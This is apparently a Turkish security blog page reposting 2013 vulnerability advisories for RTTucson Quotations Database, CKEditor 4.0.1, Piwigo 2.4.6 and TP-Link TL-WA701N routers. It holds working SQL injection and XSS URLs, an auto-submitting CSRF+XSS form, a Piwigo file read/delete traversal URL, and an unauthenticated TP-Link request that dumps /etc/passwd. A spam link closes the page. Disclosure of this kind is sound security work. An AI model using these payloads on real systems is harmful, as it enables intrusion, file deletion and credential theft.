admin | 20 Şubat 2013
No comments

RTTucson Quotations Database – Multiple Vulnerabilities

RTTucson Quotations Database – Multiple Açıklar bulunmuş olup, Açık bulucunun değerlendirmeleri aşağıdaki şekilde;

##################################################################################
       __            _                      _            ____            
      / /___ _____  (_)_____________ ______(_)__  _____ / __ _________ _
 __  / / __ `/ __ / / ___/ ___/ __ `/ ___/ / _ / ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ / 
____/__,_/_/ /_/_/____/____/__,_/_/  /_/___/____(_)____/_/   __, /  
                                                                /____/   
##################################################################################                                                                                                                              
RTTucson Quotations Database Script, Multiple Vulnerabilities
Software Page: http://www.rttucson.com/index.html
Script Demo: http://www.rttucson.com/quotations/default.php

Author(Pentester): 3spi0n
On Social: 
Greetz: Grayhatz Inc. and Janissaries Platform.
##################################################################################

[~] MySQL Injection on Demo Site 

[ ] (author.php, ID Param)
> > >  http://server/quotations/author.php?ID=5' (MySQLi Found)

[ ] (category_quotes.php, ID Param)
> > >  http://server/quotations/category_quotes.php?ID=9' (MySQLi Found)

[~] XSS on Demo Site

> >  (quote_search.php, keywords Param)
> > >  http://server/quotations/quote_search.php?keywords= <h1> Xssed-3spi0n </h1>
Category: Genel | Tags:
admin | 20 Şubat 2013
No comments

CKEditor 4.0.1 – Multiple Vulnerabilities

CKEditor 4.0.1 – Versiyonunda Genel Açıklar Bulunmuş Olup Açık hakkındaki değerlendirmeler şu şekilde.

 

=========================================== Vulnerable Software: ckeditor 4.0.1 standard Download: <a href="http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip">http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip</a> Vulns: Full Path Disclosure && XSS =========================================== Tested On: Debian squeeze 6.0.6 Server version: Apache/2.2.16 (Debian) Apache traffic server 3.2.0 MYSQL: 5.1.66-0+squeeze1 PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug  6 2012 20:08:59) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH =========================================== Vulnerable Code: /ckeditor/samples/assets/posteddata.php =============SNIP BEGINS====================

<a href="root:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets">root:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets</a># cat posteddata.php <!DOCTYPE html> <?php /* Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or <a href="http://ckeditor.com/license">http://ckeditor.com/license</a> */ ?> <html> <head>         <meta charset="utf-8">         <title>Download</title>         <link rel="stylesheet" href="sample.css"> </head> <body>         <h1>                 CKEditor &mdash; Posted Data         </h1>         <table border="1" cellspacing="0" id="outputSample">                 <colgroup><col width="120"></colgroup>                 <thead>                         <tr>                                 <th>Field&nbsp;Name</th>                                 <th>Value</th>                         </tr>                 </thead> <?php

if ( isset( $_POST ) )         $postArray = &$_POST ;                  // 4.1.0 or later, use $_POST else         $postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value ) {         if ( get_magic_quotes_gpc() )                 $postedValue = htmlspecialchars( stripslashes( $value ) ) ;         else                 $postedValue = htmlspecialchars( $value ) ;

?>                 <tr>                         <th style="vertical-align: top"><?php echo $sForm?></th>                         <td><pre><?php echo $postedValue?></pre></td>                 </tr>         <?php } ?>         </table>         <div id="footer">                 <hr>                 <p>                         CKEditor - The text editor for the Internet - <a href="<a href="http://ckeditor.com/&quot;>http://ckeditor.com</a">http://ckeditor.com/">http://ckeditor.com</a</a>>                 </p>                 <p id="copy">                         Copyright &copy; 2003-2013, <a href="<a href="http://cksource.com/&quot;>CKSource</a">http://cksource.com/">CKSource</a</a>> - Frederico Knabben. All rights reserved.                 </p>         </div> </body> </html>

=============SNIP ENDS HERE====================

&nbsp;

FULL Path Disclosure example:

URL: <a href="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php">http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php</a> METHOD: $_POST

HEADERS:

Host: hacker1.own User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 30

&nbsp;

$_POST DATA TO SEND:

bangbangbang[]=PATH DISCLOSURE

&nbsp;

Result: Warning: htmlspecialchars() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets/posteddata.php on line 38

Print screen: <a href="http://i076.radikal.ru/1302/84/edbe3f8f4524.png">http://i076.radikal.ru/1302/84/edbe3f8f4524.png</a>

=================================================

CSRF+XSS <body onload="javascript:document.forms[0].submit()"> <form name="form1" method="post" action="<a href="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php">http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php</a>" enctype="multipart/form-data"> <input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF"></li> </form>

=================================================

Print Screen:  <a href="http://i062.radikal.ru/1302/e6/25ef023dd589.png">http://i062.radikal.ru/1302/e6/25ef023dd589.png</a>

&nbsp;

================================================= And here is fixed version:  /ckeditor/samples/assets/posteddata.php

================SNIP BEGINS======================= <!DOCTYPE html> <?php /* Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or <a href="http://ckeditor.com/license">http://ckeditor.com/license</a> */ ?> <html> <head>   <meta charset="utf-8">   <title>Sample &mdash; CKEditor</title>   <link rel="stylesheet" href="sample.css"> </head> <body>   <h1>     CKEditor &mdash; Posted Data   </h1>   <table border="1" cellspacing="0" id="outputSample">     <colgroup><col width="120"></colgroup>     <thead>       <tr>         <th>Field&nbsp;Name</th>         <th>Value</th>       </tr>     </thead> <?php

if ( isset( $_POST ) )   $postArray = &$_POST ;      // 4.1.0 or later, use $_POST else   $postArray = &$HTTP_POST_VARS ;  // prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value ) {   if ( get_magic_quotes_gpc() )     $postedValue = htmlspecialchars( stripslashes((string) $value ) ) ;   else   $postedValue =htmlspecialchars((string) $value ) ;

?>     <tr>       <th style="vertical-align: top"><?php echo htmlspecialchars((string)$sForm);?></th>       <td><pre><?php echo $postedValue?></pre></td>     </tr>   <?php } ?>   </table>   <div id="footer">     <hr>     <p>       CKEditor - The text editor for the Internet - <a href="<a href="http://ckeditor.com/&quot;>http://ckeditor.com</a">http://ckeditor.com/">http://ckeditor.com</a</a>>     </p>     <p id="copy">       Copyright &copy; 2003-2013, <a href="<a href="http://cksource.com/&quot;>CKSource</a">http://cksource.com/">CKSource</a</a>> - Frederico Knabben. All rights reserved.     </p>   </div> </body> </html>

=============ENJOYYY====================

KUDOSSSSSSS ========================================= packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE ===========================================

/AkaStep
Category: Genel | Tags: ,
admin | 20 Şubat 2013
One comment

Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability

Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Açığı Bulunmuş Olup açık hakkında açık bulucunun değerlendirmeleri şu şekilde;

Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability


Vendor: Piwigo project
Product web page: http://www.piwigo.org
Affected version: 2.4.6

Summary: Piwigo is a photo gallery software for the web that comes
with powerful features to publish and manage your collection of
pictures.

Desc: Input passed to the &#39;dl&#39; parameter in &#39;install.php&#39; script
is not properly sanitised before being used to get the contents of
a resource or delete files. This can be exploited to read and delete
arbitrary data from local resources with the permissions of the web
server via directory traversal attack.

====================================================================
/install.php:
-------------

113: if (!empty($_GET[&#39;dl&#39;]) && file_exists(PHPWG_ROOT_PATH.$conf[&#39;data_location&#39;].&#39;pwg_&#39;.$_GET[&#39;dl&#39;]))
114: {
115:   $filename = PHPWG_ROOT_PATH.$conf[&#39;data_location&#39;].&#39;pwg_&#39;.$_GET[&#39;dl&#39;];
116:   header(&#39;Cache-Control: no-cache, must-revalidate&#39;);
117:   header(&#39;Pragma: no-cache&#39;);
118:   header(&#39;Content-Disposition: attachment; filename="database.inc.php"&#39;);
119:   header(&#39;Content-Transfer-Encoding: binary&#39;);
120:   header(&#39;Content-Length: &#39;.filesize($filename));
121:   echo file_get_contents($filename);
122:   unlink($filename);
123:   exit();
124: }

====================================================================


Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a


Vulnerability discovered by Gjoko &#39;LiquidWorm&#39; Krstic
                            


Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php

Vendor Patch: http://piwigo.org/bugs/view.php?id=2843



15.02.2013


--

http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
Category: Genel | Tags:
admin | 15 Şubat 2013
No comments

Photodex ProShow Producer v5.0.3297 (.pxs) Memory Corruption Exploit

photodex-exploit

Photodex ProShow Producer v5.0.3297 (.pxs) Memory Corruption Python Exploit Read more

Category: Genel | Tags:
admin | 15 Şubat 2013
No comments

TP-Link TL-WA701N / TL-WA701ND – Multiple Vulnerabilities

TP-Link TL-WA701N / TL-WA701ND – Roter'lerde açıklar bulunmuş olup, açık sayesinde /etc/passwd okunabilmekte XSS açığı oluşmaktadır.

 Device Name: TL-WA701N / TL-WA701ND
Vendor: TP-Link

============ Vulnerable Firmware Releases: ============

Firmware Version: 3.12.6 Build 110210 Rel.37112n
Firmware Version: 3.12.16 Build 120228 Rel.37317n - Published Date 2/28/2012
Hardware Version: WA701N v1 00000000
Model No.: TL-WA701N / TL-WA701ND

Firmware download: http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1

============ Vulnerability Overview: ============

    * Directory Traversal: 

Access local files of the device. For example you could read /etc/passwd and /etc/shadow.

Request:
GET /help/../../etc/passwd HTTP/1.1
Host: 192.168.178.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.2/help/

==> >  no authentication needed!!!

Response:
HTTP/1.1 200 OK
Server: TP-LINK Router
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Access Point WA701N"
Content-Type: text/html

 <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> 
 <HTML> 
 <HEAD>  <TITLE> TL-WA701N </TITLE> 
 <META http-equiv=Pragma content=no-cache> 
 <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"> 
 <LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"> 
 <SCRIPT language="javascript" type="text/javascript">  <!--
if(window.parent == window){window.location.href="http://192.168.178.2";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//-->  </SCRIPT> 
root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/TP-Link-directory-traversal.png

This traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse

    * The request for changing the password is a HTTP GET and the username and password are parameters of this HTTP GET: 

http://192.168.178.2/userRpm/ChangeLoginPwdRpm.htm?oldname=admin&oldpassword=XXXX&newname=admin&newpassword=XXXX&newpassword2=XXXX&Save=Save

    * Stored XSS: 

Injecting scripts into the parameter Desc reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

->  Wireless MAC Filtering ->  Add or Modify ->  put your XSS in the description (parameter Desc)

Example Request:
http://192.168.178.2/userRpm/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&Desc="><img src="0" onerror=alert(1)> &Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1&vapIdx=1&Save=Save

This XSS vulnerability was already documented on a other device and firmware version: http://www.exploit-db.com/exploits/19774/

    * Stored XSS: 

->  System Tools ->  SNMP:

Injecting scripts into the parameter sys_name and sys_location reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

http://192.168.178.2/userRpm/SnmpRpm.htm?snmp_agent=0&sys_contact=123&sys_name= </script> &sys_location= <script> alert(&#39;XSSed&#39;) </script> &get_community=111&get_source=123&set_community=123&set_source=111&Save=Save

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-011
Twitter: 

The traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse

The stored XSS vulnerability in the Desc parameter was already documented on a other device and firmware version: http://www.exploit-db.com/exploits/19774/

============ Time Line: ============

August 2012 - discovered vulnerability
06.08.2012 - reported vulnerability to TP-Link
14.02.2013 - public release

===================== Advisory end =====================
Category: Genel | Tags:
« Older Entries   Recent Entries »
escort bayan escort